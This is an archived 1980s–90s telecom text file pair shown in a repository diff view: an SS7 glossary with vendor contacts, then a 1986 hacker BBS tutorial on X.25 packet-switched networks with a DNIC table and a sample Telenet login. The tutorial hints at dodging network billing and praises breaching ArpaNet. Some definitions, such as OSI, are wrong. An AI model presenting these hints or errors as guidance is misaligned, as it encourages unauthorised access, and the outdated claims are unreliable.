management is a big subject - its hard to predict the future, especially with
the rate of change that's taking place in communications today. However, as
you read, a great deal of developement is being done in the area of
centralized services such as Advanced Intelligent Network (AIN). These
services rely heavily upon the SS7 protocol to communicate.
Glossary of Telephone Network Terms
AIN - Advanced Intelligent Network. A network concept in which services are
created and managed in a centralized location. This moves the service
intelligence from the telephone office to a service control point.
ANSI - American National Standards Institute. Refines the Global SS7 standards
specified by the ITU-TS for North American and regional Bell operating
companies.
Associated mode - Signalling mode in which a node is directly connected to the
destination node by a linkset.
CLASS - Custom Local Area Signalling Services. A set of services usually
targeted for residential and small business which provides the equivalent of
many business features such as caller identification and automatic recall.
Connection-oriented signalling - Signalling used to set up, monitor and take
down calls or pass information related to a call connection.
Connectionless signalling - Signalling used to transfer information not
associated to a particular connection. Often referred to as a Query/Response
method.
FISU - Fill-in signalling units. An SS7 packet sent when there are no MSUs to
be sent. Since SS7 links transmit a continuous stream of packets, these are
used as filler when there are no messages which need to be sent.
GTT - Global Title Translations. The process of converting digits to an SS7
address. SS7 uses point codes and subsystems to deliver messages.
ISDN - Integrated Services Digital Network. A network concept which provides
multiple integrated services from a single point of access. ISDN provides
access to voice, circuit-switched data and packet-switched data as well as
enhanced call control signalling from the end user to the telephone office.
ISUP - ISDN user part. Part of the SS7 protocol which provides connection-
oriented signalling used for setting up, monitoring and taking down trunks.
ITU-TS - International Telecommunications Union-Telecommunications
Standardization (Sector). Organization that Global SS7 Standards.
Link - A communication channel between two adjacent signalling points which
provides a path for messages to travel.
Linkset - A set of links between two adjacent signalling points.
LSSU - Link-Status Signalling Unit. An SS7 packet used to convey changes in
the link state between nodes.
MSU - Message-Signalling Unit. An SS7 packet used to send information across
the network.
MTP - Message-Transfer Part. Levels one through three of the SS7 protocol. MTP
provides reliable transfer of signalling units between network nodes. Its
responsibilities include point code routing and network management.
NSP - Network-Service Part. Refers to the combined services of MTP and SCCP.
Together, these provide end-to-end application routing.
OSI - Open System Interconnection. The telephone hook-up system commonly used
throughout the world.
Point Code - An address for an SS7 network node.
Quasi-Associated Mode - Signalling mode in which a message must travel over
two or more linksets to reach its destination. It is not directly connected to
the destination point.
Route - A path from a signalling point to a destination.
Routeset - A collection of routes used to access a destination.
SCCP - Signalling-Connection Control Part. Part of the SS7 protocol which
provides additional routing capabilities to the MTP, including subsystem
routing and global title translations.
SCP - Service Control Point. A database used to access information about calls
such as routing, billing and the selection of the service provider. The SCP
provides a centralized form of intelligence for handling calls.
SP - Signalling Point. A signalling point that can originate and terminate SS7
messages but does not have TCAP capability. The term signalling point is
sometimes used to refer to any network node with signalling capability;
however this should not be confused with the specific "Signalling Point" node
type.
SSP - Service-Switching Point. A node that can originate and terminate
messages but does not have the capability to transfer them. It also has the
ability to send TCAP messages.
SS7 - Signalling System 7. A system that specifies the signalling protocol for
the telephone network.
STP - Signalling-Transfer Point. A node used to transfer messages between
other switching nodes. Acts as a message switching center.
subsystem - An application at a node which uses the routing capabilities of
SCCP.
TCAP - Transcaction Capabilities Part. Part of the SS7 protocol which provides
a generic format for transferring applications-related information.
trunk - Facility which carries voice or data traffic between two telephone
offices.
Information:
Signalling System 7
Travis Russell
McGraw-Hill
Computer Telephony
Editorial/Business office
12 West 21 Street
New York, NY 10010
tel: 212 691 8215
fax: 212 691 1191
Subscriptions
(free to qualified requesters)
tel: 800 677 3435
tel: 215 355 2886
fax: 215 355 1068
Vendors:
Telesoft Design, Inc.
3475 Lenox Road NE Suite 400
Atlanta, GA 30326, USA
tel: 404 238 0528
fax: 404 235 0529
email: tsdusa@mindspring.com
Telesoft Design, Ltd.
Unit 1 Luccombe Business Park
Milton Abbas, Dorset, DT11 0BD, UK
tel: 44 0 1258 880358
fax: 44 0 1258 880206
email: telesoft@tsdesign.zynet.co.uk
DataKinetics Limited
Fordingbridge Hampsire England
tel: 44 0 1425 655050
fax: 44 0 1425 655075
Binary file not shown.
+207
View File
@@ -0,0 +1,207 @@
[][][][][][][][][][][][][][][][][][][]
[] []
[] THE INS AND OUTS []
[] OF []
[] PACKET SWITCHING []
[] []
[] by: The Seker []
[] Tribunal of Knowledge! []
[][][][][][][][][][][][][][][][][][][]
[] Written (c) June 23, 1986 []
[][][][][][][][][][][][][][][][][][][]
'TRIBUNAL COMMUNICATIONS LTD'
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Not many people are quite aware how complex packet switched networks are.
In this file I hope to clear up all confusion and answer all questions
concerning packet switching and making international datacalls via packet
switched networks.
HISTORY
=======
Using normal phone lines, computers can only transmit data at speeds up to
1200 bps efficiently. This is very slow compared to the inner workings of even
the slowest computer. If computers could transmit across phone lines at higher
speeds, 9600 bps for example, there would still be the problem of using a
compatible protocol. Packet switched networks take care of these and other
problems dealing with communications.
The idea of developing a completely computerized network for computers was
first discussed in the mid 1960's..probably someplace like Bell Labs, MIT, or
the like. But it wasn't until a decade later that the theory was put into
construction.
The first packet network was a project of the Defense Department. They
labeled it ArpaNet. It was and still is a boon for advanced hackers, as it is
host to over 300 government related computers. (See 'Hacking ArpaNet' written
by the Wizard of ArpaNet for an indepth look at breaching this system.)
Today there are over five commercial packet networks in the United States
alone (Telenet, Tymnet, CompuServe, etc), and many more throughout the world.
HOW IT WORKS
============
In essence, packet switching services operate at 4800 bps full duplex
(both direction simulstaneously) and use a form of TDM (Time Division
Multiplexing), a transmission which is basis for most of the world's voice
communications. Transmission streams are separated into convenient sized
blocks or 'packets', each one of which contains a head and tail signifying the
origination and destination of the data. The packets are assembled by either
the originating system or by a special facility supplied by the packet switch
system. Packets in a single transmission may follow the same physical path
(same cable) or may use an alternate route (ie. a detour cable) depending on
the congestion of the system. The packets from one 'conversation' are very
likely to be interleaved with packets from other 'conversations'. The
originating and receiving computers see none of this mixing. At the receiving
end, the various packets are stripped of their routing information, and
re-assembled in correct order before presentation to the computer terminal.
All public networks that use packet switching have installed a standard
protocall to try and be compatible with each other. (good luck) The standard,
which is called CCITT X.25 (Developed at the Geneva conferences.), is
implemented on all international datacalls. This is a complex system for
interface between data terminal equipment and data circuit-terminating
equipment.
ACCESSING
=========
Users (hackers) can access packet switching in a variety of ways. Special
terminals called Packet Terminals, which are usually hard wired to the nearest
PSS (Packet Switch Stream), that are able to create and arrange data into the
correct format are often used. This is very expensive, a reason why you will
only be likely to see these type of terminals within large company office
buildings. The average person will probably access a packet network using an
ordinary ascii terminal (computer and modem), and connect to a special PSS
facility called a PAD (Packet Assembler/Disassembler) which will handle the
formatting for them.
USING
=====
To use a public packet network it is usually required for one to have a
NUI (Network User Identity) which is registered at your local PSE (Packet
Switch Exchange) for billing purposes...or a way around this.
Dial into your local PAD (often called port) and enter your NUI. If a
valid ID is not given, the port will usually throw you off. (There are a few
exceptions which we will discuss later.) Then one enters the NUA (Network User
Address) or call name of the computer he/she wants to access. Each computer on
a network has one given to them. This is usually in the form of numbers or
somtimes letters. (As in Tymnet's case.) After the correct information is
entered, the network will connect you via its private sattelite system to the
local phone system of your destination and then onto the computer you wish
to access.
BILLING
=======
Billing on networks is done to either the user or reversed and charged to
the designated computer. Charging is not done according to the distance of the
call or by the time passed, rather by how many packets exchanged and sometimes
a small fee for CPU (Centeral Processing Unit) time.
Many packet networks do not require you to have an NUI at all. One of
these that many of you probably have worked with is Telenet. It is a leading
public network throughout the continent. Billing on there is a variation of
the norm. There is only a charge to a user when he/she wants to access a
computer internationally or one which doesn't accept the charges of the
datacall. (ie. REFUSE COLLECT CONNECT 00 AA) Billing like this will probably
disappear soon due to the greed of big business.
INTERNATIONAL DATACALLS
=======================
If a person wishes to call a computer located on a foreign network, there
is a little procedure which must be done. As I said earlier, each computer on
a network has its own address. (NUA) Networks also have their own 'address',
which is called a DNIC. (Data Network Identification Code) This code is four
numerical digits long. The first three numbers in this code represent which
country the network is located in. The fourth digit is which service in that
particuliar country, as some countries have more than one network. (For
example, 5052 is Australia's Auspac DNIC. 505 is the country code. 2 is the
service code.) A list follows:
COUNTRY NETWORK DNIC
------------------------------------------------------
Australia Auspac 5052
Australia Midas 5053
Belgium Euronet 2062/2063
Canada Datapac 3020
Canada Globedat 3025
Canada Infoswitch 3029
Denmark Euronet 2383
France Transpac 2080
France Antilles Euronet 3400
Germany (West) Datex P 2624
Germany (West) Euronet 2623
Great Britain IPSS 2342
Hong Kong IDAS 4542
Irish Republic Euronet 2723
Italy Euronet 2223
DDX-P 4401
Japan Venux-P 4408
Luxembourg Euronet 2703
Netherlands Euronet 2043
Norway Norpak 2422
Singapore Telepac 5252
South Africa Saponet 6550
Spain TIDA 2141
Sweden Telepak 2405
Switzerland Datalink 2289
Switzerland Euronet 2283
USA Autonet 3126
USA CompuServe 3132
USA ITT (UDTS) 3103
USA RCA (LSDS) 3113
USA Telenet 3110
USA Tymnet 3106
USA Uninet 3125
USA WUI (DBS) 3104
As you can see, the the United States has many services. But their DNIC
doesn't follow the pattern I described earlier. (ie. first three digits
represent country, last is service) I am not quite sure why this is, but I
think it may be because each of the US services listed are privately owned.
As I was saying earlier, there is a little extra bit of information you
must give the network when making an international call. Instead of just
emtering the NUA like on a domestic call, you have to enter the DNIC and append
the NUA or you will not complete you call and probably will get an error code.
Here is what a call from Telenet to Cambridge University's port selector in
England, which is located on Euronet (In Britain they call it IPSS.) would
look like:
TELENET
714A
TERMINAL= d1
ID EXAMPLE
PASSWORD?
ID VALID
c 234222339399
CONNECTED TO 234 222339399
What I just did was connect to a Telenet port. Enter my NUI. Then enter
the DNIC for IPSS in Britain (2342) and appended the NUA for Cambridge
University. (22339399) Then I was connected.
REFERENCES
==========
For more detailed info on packet switching and its uses, etc, I recommend
the following two books:
'Data Communications: Facilities, Networks, and Systems Design'
Doll, Dixon R., New York, Wiley, c1978
'Packet Radio'
Rouleau, Robert and Ian Hodgson, Blue Ridge Summit, Pa., Tab Books, c1981
ACKNOWLEDGEMENTS
================
Much of the imformation within was provided by:
Cyclone II
Slave Driver
NOTE: This document was written for informational purposes only. Any
application of what was provided within is responsibility of the user,
not the author.
>>>>>>>>>>>>>>> (c) 1986 TRIBUNAL OF KNOWLEDGE! <<<<<<<<<<<<<<<